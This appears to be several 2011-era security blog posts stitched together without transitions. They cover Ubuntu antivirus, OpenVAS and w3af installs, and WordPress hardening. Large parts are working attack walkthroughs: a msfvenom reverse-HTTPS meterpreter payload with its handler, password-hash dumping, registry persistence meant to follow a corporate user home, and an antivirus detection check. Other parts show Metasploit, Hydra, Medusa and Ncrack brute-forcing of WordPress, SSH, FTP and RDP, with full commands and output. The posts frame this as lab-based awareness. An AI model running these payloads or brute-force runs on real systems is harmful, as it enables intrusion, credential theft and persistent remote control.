Now for a quick background check; Ubuntu is stable, easy to use and a rock solid desktop. I have been using it since the Warty Warthog (Ubuntu 4.10 ~ 2004), it runs on all my systems: home server, virtual servers and laptops.

Back to the question:

An Ubuntu Virus?

, the short answer is no there is no significant threats to an Ubuntu system from a virus. There are cases where you may want to run it on a desktop or server but for the majority of users, you do not need antivirus on Ubuntu.

Keep in mind that while you don’t need anti-virus does not mean you don’t need to be security aware.

Members of the Ubuntu community have put together an excellent introduction to Security on Ubuntu Linux. There are also free firewall test and other scanning tools available to ensure your network is correctly configured.

Once you have familiarized yourself with the concepts and information in the guide; if you are really keen (or paranoid) I would suggest a security addition to your systems, it is known as Host Based Intrusion Detection system. My HIDS agent of choice is ossec.net, it will not detect a virus as such but it does alert you to anomalous behavior on the system by examining system logs and watching the file system. If you chose to run OSSEC you probably do not need to run rkhunter and chkrootkit that are mentioned on the Basic Security Wiki page.

This old install guide I did for OSSEC on Ubuntu has the basic steps in getting it up and running.

Finally if you have a need for running anti-virus on Ubuntu, there is a good article on the Ubuntu wiki that has links to the popular and free antivirus software available (such as AVG, Avast, Avira) and the open source clamAV.

Hit the link for the full list – SQL Injection Scanners

First of course there is the HackerTarget.com scan, externally facing and coming in at a fairly high level. The system downloads some of your pages, does analysis, checks a few additional links and gives you a tidy little report detailing any security issues discovered.

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute Forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put brute forcing for:

Additionally username’s can also be gathered through some WordPress themes, RSS feeds, and author page URI’s such as /blog/author/admin/.

These tools and scripts that can be utilized in your Penetration Testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient; everyone has Metasploit installed… don’t they?

An NSE (nmap scripting engine) script was released for Nmap that does plugin brute forcing.

Just in the last few days a new tool hit the tubes wpscan. Still under development it does a few different checks including brute forcing for accounts.

All the tools referenced above are dedicated towards external testing of wordpress installations. There are other options that involve installation of plugins into the wordpress installations for deeper monitoring.

Let’s first look at a common locked down Corporate Network. Then we will show how pwnage is not difficult with this new Payload.

Lab Setup
I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only opened 22 (for sftp) and proxy port (tcp 800). This has simulated the corporate network in the diagram above.

Now build the malicious executable.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM…
[*] 192.168.56.101:43681 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

Evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Lets reboot the smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait…. success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg

Lets improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d ‘C:\windows\evil_https.exe’
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM…
[*] 192.168.56.101:55182 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ — –=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/…
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows7 Enterprise with “Work Network Settings” (no Anti-Virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM…
[*] 192.168.56.101:50910 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…
[*] Checking for contermeasures…
[*] Getting Windows Built in Firewall configuration…
[*]
[*] Domain profile configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy…
meterpreter >

Booya!

Note that both the client systems were not running any Anti-virus. The executable may have been blocked if they were.

Lets check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid Anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let’s have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

By understanding the attack you can then start to discuss and find effective ways to defend against these types of targeted attacks.

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* configure script now honors /etc/ld.so.conf.d/ directory

Hydra 6.4 Released

Lets get going, we are going to build a server version from source on Ubuntu 10.04 LTS, will give 11.04 a go in the near future. These packages should get you going.

apt-get install build-essential cmake doxygen uuid libgpgme11 libgpgme11-dev libpcap0.8-dev libpcap0.8 uuid-dev pkg-config libglib2.0* autoconf libgnutls-dev bison sqlite3 libsqlite3-dev xsltproc libxslt1-dev libmicrohttpd-dev xmltoman

Information for getting the wmi library built is here, the following is a fast summary.

wget http://www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2

tar xjvf wmi-1.3.14.tar.bz2

To enable the WMI integration in OpenVAS, a patch needs to be applied to the
source you just downloaded.

wget http://www.openvas.org/download/wmi/openvas-wmi-1.3.14.patch

Copy the patch to the wmi-1.3.14 directory you just created and apply the patch
with the following command:

$ patch -p1 < openvas-wmi-1.3.14.patch

In the wmi-1.3.14 directory, execute the following commands:
cd Samba/source
./autogen.sh
./configure
make proto all
make libraries

bash install-libwmiclient.sh

Now we should be good to go on the main application building.

wget http://wald.intevation.org/frs/download.php/862/openvas-scanner-3.2.3.tar.gz
wget http://wald.intevation.org/frs/download.php/871/openvas-manager-2.0.4.tar.gz
wget http://wald.intevation.org/frs/download.php/853/openvas-administrator-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/857/greenbone-security-assistant-2.0.1.tar.gz
wget http://wald.intevation.org/frs/download.php/860/gsd-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/851/openvas-cli-1.1.2.tar.gz

tar zxvf openvas-cli-1.1.2.tar.gz
tar zxvf openvas-libraries-4.0.5.tar.gz
tar zxvf openvas-manager-2.0.4.tar.gz
tar zxvf openvas-scanner-3.2.3.tar.gz
tar zxvf openvas-administrator-1.1.1.tar.gz

cd openvas-libraries-4.0.5
cmake .
make
make install

cd openvas-scanner-3.2.3
cmake .
make
make install

cd openvas-cli-1.1.2
cmake .
make
make install

cd openvas-administrator-1.1.1
cmake .
make
make install

cd greenbone-security-assistant-2.0.1
cmake .
make
make install

ldconfig

Run the initial commands build your certificate and create an openvas user.

openvas-mkcert
openvas-adduser

openvas-nvt-sync
< plugins scroll by -- snip >
[i] Download complete
[i] Checking dir: ok
[i] Checking MD5 checksum: ok

openvassd
Loading the plugins… 8058 (out of 21431)

Looking good so far.

There are a lot of components to this installation. There is a handy script that checks your OpenVas configuration for problems. Download it, save as openvas-check.sh and run it.

wget http://wald.intevation.org/plugins/scmsvn/viewcvs.php/*checkout*/trunk/tools/openvas-check-setup?root=openvas -O openvas-check.sh

./openvas-check.sh

openvas-check-setup 2.0.6
Test completeness and readiness of OpenVAS-4

Please report us any non-detected problems and
help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.

Use the parameter –server to skip checks for client tools
like GSD and OpenVAS-CLI.

Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.2.3.
OK: OpenVAS Scanner CA Certificate is present as /usr/local/var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /usr/local/var/lib/openvas/plugins contains 21431 NVTs.
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 2.0.4.
OK: OpenVAS Manager client certificate is present as /usr/local/var/lib/openvas/CA/clientcert.pem.
ERROR: No OpenVAS Manager database found. (Tried: /usr/local/var/lib/openvas/mgr/tasks.db)
FIX: Run ‘openvasmd –rebuild’ while OpenVAS Scanner is running.

ERROR: Your OpenVAS-4 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.

If you think this result is wrong, please report your observation
and help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.

Notice how the check script detects the problem and prompts you with a fix.

openvasmd –rebuild

We still have an error in openvas-check.sh results, but this is because we have not built the GSD (Greenbone security desktop). We are not building the desktop client as this is a remote server.

openvasd
gsad
openvasmd

This should start up the services. The Greenbone Security Assistant runs on 80 and 443. You can use command line options force ssl. I have done some initial testing and have to say its impressive. Fast, responsive and intuitive – unlike Nessus and its flash based web gui that I find to be clunky and difficult to manage.

Version 4.0 of OpenVas is good at this stage. I will definitely have to do more testing and look at migrating our version 3 based online scanning solution to version 4.

Poor WordPress password security is an ongoing issue, the purpose of this post is to highlight how easy it is to break into wordpress admin accounts that have weak passwords.

Metasploit Framework is an open source penetration testing application that has modules for the explicit purpose of breaking into systems and applications. This is the software we will use to demonstrate poor WordPress security.

Did you know with the wordpress admin account you not only lose control of your blog but on many hosts the attacker can then run code on the server with the rights of the web hosting account or web server. With the ability to run commands locally, full server root compromise is the next step.

I will be performing the password audit against a local VirtualBox running WordPress. This sort of activity is illegal in most places if used against systems that you do not have explicit permission to test.

First I will download and install the Metasploit Framework into my Ubuntu Linux 11.04 Desktop system. This will be a minimal install of Metasploit with the mini installer and minimal packages to get this module running.

apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

wget http://updates.metasploit.com/data/releases/framework-3.7.1-linux-x64-mini.run

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

chmod +x framework-3.7.1-linux-x64-mini.run

sudo ./framework-3.7.1-linux-x64-mini.run

Since I am on my Ubuntu Desktop a pretty rapid7 installer pops up and it is a matter of clicking through the installer.

./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf > show auxiliary

msf > use scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) >

msf auxiliary(wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /wp-login.php no Define the path to the wp-login.php file
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Enumerate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(wordpress_login_enum) > set USERNAME admin
USERNAME => admin
msf auxiliary(wordpress_login_enum) > set PASS_FILE /home/test/500-worst-passwords.txt
PASS_FILE => /home/test/500-worst-passwords.txt
msf auxiliary(wordpress_login_enum) > exploit

[*] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Running User Enumeration
[*] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Checking Username:’admin’
[+] http://192.168.56.101:80/wp-login.php – WordPress Enumeration- Username: ‘admin’ – is VALID
[+] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Found 1 valid user
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Running Bruteforce
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Skipping all but 1 valid user
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:”
[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’

<-------------- SNIP -------------------->

[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:’albert’
[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:’toor’
[+] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – SUCCESSFUL login for ‘admin’ : ‘toor’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Password has been found! Testing these 500 passwords was fast. Obviously over the speed will depend on the network link and the server speed.

One of the things that makes breaking wordpress accounts easy is that the username can be enumerated from the admin login screen.

It is important to rename the admin account on installations of wordpress and to use a complicated password of adequate length. I have shown above how easy it is to guess hundreds of passwords very quickly.

More details on securing your system can be found at WordPress.org, understanding what is running on your wordpress blog and other security risks is an important step in maintaining a secure system. HackerTarget.com has a free WordPress Security Scan that can be used to check some of these issues.

Details on the Metasploit Module used for this testing can be found here

To fire it up on Ubuntu only a couple of steps are required:

Download the latest version from here: http://sourceforge.net/projects/w3af/files/
sudo apt-get install python-nltk python-soappy python-lxml python-svn python-scapy graphviz

tar jxvf w3af-1.0-stable.tar.bz2
./w3af_gui

The first thing to notice is the shiny new splash screen highlighting the new owner of the project that being Rapid7.

A notice that I don’t have the latest update appears, so auto update is performed after confirmation.

Following some local testing of random wordpress plugins in a turnkey linux virtualbox host I found the w3af framework to be much improved in terms of stability and speed. This is a welcome improvement as previously python traces and broken scans was annoying enough to make it unusable unless stepping through and performing one or two audit plugins at a time.

Further exploration is required, as the potential for an excellent open source web application testing framework has always been there. I expect to see closer integration between Metasploit and w3af in future releases.

Various security hardening by Alexander Concha.

Taxonomy query hardening by John Lamansky.

Prevent sniffing out user names of non-authors by using canonical redirects. Props Verónica Valeros.

Media security fixes by Richard Lundeen of Microsoft, Jesse Ou of Microsoft, and Microsoft Vulnerability Research.

Improves file upload security on hosts with dangerous security settings.

Cleans up old WordPress import files if the import does not finish.

Introduce “clickjacking” protection in modern browsers on admin and login pages.

Consult the change log for full details.

I am focusing on tools that allow remote service brute forcing. There are also powerful tools available for cracking encrypted password hashes on a local system.

The three tools I will assess are Hydra, Medusa and Ncrack (from nmap.org).

Installation of all three tools was straight forward on Ubuntu Linux.

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
./configure
make
make install

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
./configure
make
make install

Then I grabbed a list of 500 passwords from skullsecurity.org.

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

Testing was done against a Linux Virtual Machine running on Virtualbox.

The first series of tests was against SSH. I set the root account with the password “toor”. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak – use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10 login: root password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Success with Hydra!

~# ncrack -p 22 –user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: ‘root’ ‘toor’

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Success with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds

Success with Medusa, however it took over 10 times as long with the default settings of each tool.

Lets try and speed things up a bit. cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)’ failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: ‘root’ ‘toor’

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Hydra any faster, up the threads to 32?

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak – use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10 login: root password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way it appears the default speed is pretty good for both tools.

Now to try hitting ftp server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: ‘test’ ‘toor’

Ncrack done: 1 service scanned in 69.01 seconds.

Push it faster….

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: ‘test’ ‘toor’

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak – use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops. Thats not so good.

Now for Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Hmmm, struggling too.

Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: ‘test’ ‘toor’

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!

ncrack has the ability to also brute force RDP accounts. So lets hit a windows box.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: ‘administrator’ ‘toor’

Ncrack done: 1 service scanned in 6072 seconds.

Protocols supported include:

Hydra – TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa – AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

